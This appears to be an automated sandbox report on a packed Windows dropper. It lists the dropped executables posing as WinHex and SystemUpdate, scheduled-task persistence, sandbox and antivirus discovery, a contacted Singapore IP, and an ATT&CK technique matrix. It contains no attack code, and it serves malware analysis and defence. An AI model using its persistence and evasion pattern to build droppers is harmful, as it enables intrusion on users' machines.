Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_ctypes.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_bz2.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_lzma.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ecb.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cbc.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cfb.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ofb.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ctr.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Util\_strxor.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_BLAKE2s.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA1.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA256.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_MD5.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_Salsa20.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Protocol\_scrypt.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Util\_cpuid_c.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_ghash_portable.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_ghash_clmul.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ocb.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_aes.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_aesni.pyd VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A673B580 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7A673B580
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6754E20 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7A6754E20
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0054D460 __EH_prolog3_GS,memset,RtlGetVersion,GetModuleHandleW,GetProcAddress,GetLastError,13_2_0054D460
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: SetupHost.exe, 0000000D.00000003.1796954749.0000000003380000.00000004.00000020.00020000.00000000.sdmp, SetupHost.exe, 0000000D.00000003.1796287324.0000000003380000.00000004.00000020.00020000.00000000.sdmp, SetupHost.exe, 0000000D.00000003.1797347208.000000000337B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\$Windows.~WS\Sources\SetupHost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
MITRE ATT&CK matrix, flattened to one line per tactic (a number in parentheses is the count the report attaches to that technique; techniques without a number carry no count in the report):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Drive-by Compromise (1); Replication Through Removable Media (1); Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Windows Management Instrumentation (41); Native API (2); Command and Scripting Interpreter (112); Scheduled Task/Job (2); PowerShell (1); Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: DLL Side-Loading (1); Scheduled Task/Job (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (11); Scheduled Task/Job (2); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (1); Timestomp (1); DLL Side-Loading (1); Masquerading (11); Modify Registry (1); Virtualization/Sandbox Evasion (151); Access Token Manipulation (1); Process Injection (11)
Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery (2); Peripheral Device Discovery (11); File and Directory Discovery (3); System Information Discovery (68); Query Registry (1); Security Software Discovery (271); Process Discovery (1); Virtualization/Sandbox Evasion (151); Application Window Discovery (1); Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data (1); Input Capture (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (21); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (3); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph ID: 1581935 | Sample: T1#U52a9#U624b1.0.1.exe | Startdate: 29/12/2024 | Architecture: WINDOWS | Score: 48

Sample-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Sigma detected: Suspicious File Creation In Uncommon AppData Folder; AI detected suspicious sample
Sample-level DNS/IP info: sni1gl.wpc.alphacdn.net; shed.dual-low.s-part-0035.t-0009.t-msedge.net; 5 other IPs or domains

Process tree recovered from the graph's node labels and edges (a number in parentheses after a process name is the count carried on that node in the graph):

T1#U52a9#U624b1.0.1.exe (13)
  dropped: C:\Users\user\AppData\...\unicodedata.pyd, PE32+; C:\Users\user\AppData\Local\...\select.pyd, PE32+; C:\Users\user\AppData\Local\...\python38.dll, PE32+; 8 other files (none is malicious)
  signatures: Suspicious powershell command line found; Uses Register-ScheduledTask to add task schedules; Found pyInstaller with non standard icon
  T1#U52a9#U624b1.0.1.exe (3)
    dropped: C:\Users\user\AppData\WinHex.exe, PE32+; C:\Users\user\AppData\SystemUpdate.exe, PE32+; C:\Users\user\AppData\LineInst.exe, PE32
    signatures: Suspicious powershell command line found
    cmd.exe (1)
      signatures: Uses cmd line tools excessively to alter registry or file data; Uses schtasks.exe or at.exe to add and modify task schedules
      conhost.exe
      attrib.exe (1)
      attrib.exe (1)
      attrib.exe (1)
    powershell.exe (37)
      signatures: Loading BitLocker PowerShell Module
      conhost.exe
    powershell.exe (33)
      conhost.exe
WinHex.exe (63)
  dropped: C:\Users\user\AppData\...\unicodedata.pyd, PE32+; C:\Users\user\AppData\Local\...\select.pyd, PE32+; C:\Users\user\AppData\Local\...\python38.dll, PE32+; 51 other files (none is malicious)
  WinHex.exe
    DNS/IP info: 8.212.101.195, 1122, 49905, 49943 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore
    signatures: Tries to detect sandboxes / dynamic malware analysis system (QueryWinSAT)
    cmd.exe
      SystemUpdate.exe
        dropped: C:\Users\user\AppData\...\unicodedata.pyd, PE32+; C:\Users\user\AppData\Local\...\select.pyd, PE32+; C:\Users\user\AppData\Local\...\python38.dll, PE32+; 8 other files (none is malicious)
        signatures: Found pyInstaller with non standard icon
        SystemUpdate.exe
          cmd.exe → conhost.exe, schtasks.exe
          cmd.exe → conhost.exe, schtasks.exe
          cmd.exe → conhost.exe, schtasks.exe
          14 other processes → conhost.exe, schtasks.exe, 26 other processes
      conhost.exe
LineInst.exe (27)
  dropped: 19 other files (none is malicious)
  SetupHost.exe
    signatures: Query firmware table information (likely to detect VMs)
10 other processes
  DNS/IP info: 192.168.2.4, 1122, 138, 443 unknown unknown; 127.0.0.1 unknown unknown; 239.255.255.250 unknown Reserved
  chrome.exe
    DNS/IP info: www.google.com 142.250.181.68, 443, 49780 GOOGLEUS United States; sni1gl.wpc.omegacdn.net 152.199.21.175, 443, 49813 EDGECASTUS United States; 13 other IPs or domains
  chrome.exe
  chrome.exe
  5 other processes

Source | Detection | Scanner
T1#U52a9#U624b1.0.1.exe | 3% | ReversingLabs
T1#U52a9#U624b1.0.1.exe | 14% | Virustotal
Source | Detection | Scanner
C:\$Windows.~WS\Sources\DU.dll | 0% | ReversingLabs
C:\$Windows.~WS\Sources\DiagTrack.dll | 0% | ReversingLabs
C:\$Windows.~WS\Sources\DiagTrackRunner.exe | 0% | ReversingLabs
C:\$Windows.~WS\Sources\Diager.dll | 0% | ReversingLabs
C:\$Windows.~WS\Sources\MediaSetupUIMgr.dll | 0% | ReversingLabs
C:\$Windows.~WS\Sources\SetupCore.dll | 0% | ReversingLabs
C:\$Windows.~WS\Sources\SetupHost.exe | 0% | ReversingLabs
C:\$Windows.~WS\Sources\SetupMgr.dll | 0% | ReversingLabs
C:\$Windows.~WS\Sources\WinDlp.dll | 0% | ReversingLabs
C:\$Windows.~WS\Sources\pidgenx.dll | 0% | ReversingLabs
C:\$Windows.~WS\Sources\setupplatform.dll | 0% | ReversingLabs
C:\$Windows.~WS\Sources\unbcl.dll | 0% | ReversingLabs
C:\$Windows.~WS\Sources\wdsclientapi.dll | 0% | ReversingLabs
C:\$Windows.~WS\Sources\wdscore.dll | 0% | ReversingLabs
C:\$Windows.~WS\Sources\wdscsl.dll | 0% | ReversingLabs
C:\$Windows.~WS\Sources\wdsimage.dll | 0% | ReversingLabs
C:\$Windows.~WS\Sources\wdstptc.dll | 0% | ReversingLabs
C:\$Windows.~WS\Sources\wdsutil.dll | 0% | ReversingLabs
C:\$Windows.~WS\Sources\wpx.dll | 0% | ReversingLabs
C:\Users\user\AppData\LineInst.exe | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\VCRUNTIME140.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\_bz2.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\_hashlib.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\_lzma.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\_socket.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\_ssl.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\libcrypto-1_1.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\libssl-1_1.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\python38.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\select.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\unicodedata.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_ARC4.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_Salsa20.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_chacha20.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_pkcs1_decode.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_aes.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_aesni.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_arc2.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_blowfish.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cast.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cbc.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cfb.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ctr.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_des.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_des3.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ecb.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_eksblowfish.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ocb.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ofb.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_BLAKE2b.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_BLAKE2s.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_MD2.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_MD4.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_MD5.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_RIPEMD160.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA1.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA224.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA256.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA384.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA512.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_ghash_clmul.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_ghash_portable.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_keccak.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_poly1305.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Math\_modexp.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Protocol\_scrypt.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_ec_ws.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_ed25519.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_ed448.pyd | 0% | ReversingLabs
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://dl.delivery.mp.microsoft. | 0% | Avira URL Cloud | safe
http://dl.delivery.mp.mi% | 0% | Avira URL Cloud | safe
http://osoft.com/pki/ceooCerAut_2010-06 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
sni1gl.wpc.alphacdn.net | 152.199.21.175 | true | false | - | high
sni1gl.wpc.omegacdn.net | 152.199.21.175 | true | false | - | high
www.google.com | 142.250.181.68 | true | false | - | high
default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.58.101 | true | false | - | high
api.company-target.com | 108.139.79.18 | true | false | - | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | - | high
js.monitor.azure.com | unknown | unknown | false | - | high
c.s-microsoft.com | unknown | unknown | false | - | high
assets.adobedtm.com | unknown | unknown | false | - | high
support.content.office.net | unknown | unknown | false | - | high
aadcdn.msftauth.net | unknown | unknown | false | - | high
login.microsoftonline.com | unknown | unknown | false | - | high
mem.gfx.ms | unknown | unknown | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688 | T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667988200.0000029E6BEDC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000002.1717160899.0000029E6D860000.00000004.00001000.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713338433.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666122628.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1807634699.0000026E04C9E000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1806390027.0000026E04CA4000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1807381984.0000026E04C9E000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1806540594.0000026E04C9E000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1806410648.0000026E04C9E000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1806220123.0000026E04C9E000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1806981535.0000026E04C9E000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1807194586.0000026E04C9E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://mahler:8092/site-updates.py | T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1668074546.0000029E6BF35000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1809266140.000001C110073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1844983606.0000029158155000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000004.00000002.1749348484.0000029148308000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.1749348484.0000029148308000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.1745831815.000001C100228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1749348484.0000029148308000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.1749348484.0000029148308000.00000004.00000800.00020000.00000000.sdmp | false | - | high
